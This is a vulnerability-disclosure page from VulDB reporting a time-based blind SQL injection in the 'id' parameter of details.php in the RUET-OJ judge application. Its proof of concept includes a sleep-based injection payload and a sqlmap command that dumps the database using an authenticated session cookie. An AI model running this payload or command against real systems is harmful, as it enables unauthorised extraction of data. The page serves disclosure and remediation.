Submit #674401: shawon100 RUET-OJ BETA 2016 Time Based Blind SQL Injection - details.phpinfo

Titleshawon100 RUET-OJ BETA 2016 Time Based Blind SQL Injection - details.php
DescriptionThere is a Time Based Blind SQL Injection vulnerability in the "id" parameter of the details.php file, allowing an attacker to dump the entire database. You must be authenticated [POC] With burp browser GET /details.php?id=1'and+sleep(5)%23 Automate with sqlmap to perform the database dump. sqlmap -u http://ip/details.php?id= --cookie=PHPSESSID=f1cc07f2b44446f48035e77e8184cec7 -D reg --tables The person responsible for the application was informed via email on July 25, 2025. But I did not receive a response. Link application: https://github.com/shawon100/RUET-OJ
User
 ManinhuGuitar (UID 84672)
Submission10/14/2025 01:42 (6 months ago)
Moderation10/27/2025 11:22 (13 days later)
StatusAccepted
VulDB entry330106 [shawon100 RUET OJ up to 18fa45b0a669fa1098a0b8fc629cf6856369d9a5 /details.php ID sql injection]
Points17

Do you want to use VulDB in your project?

Use the official API to access entries easily!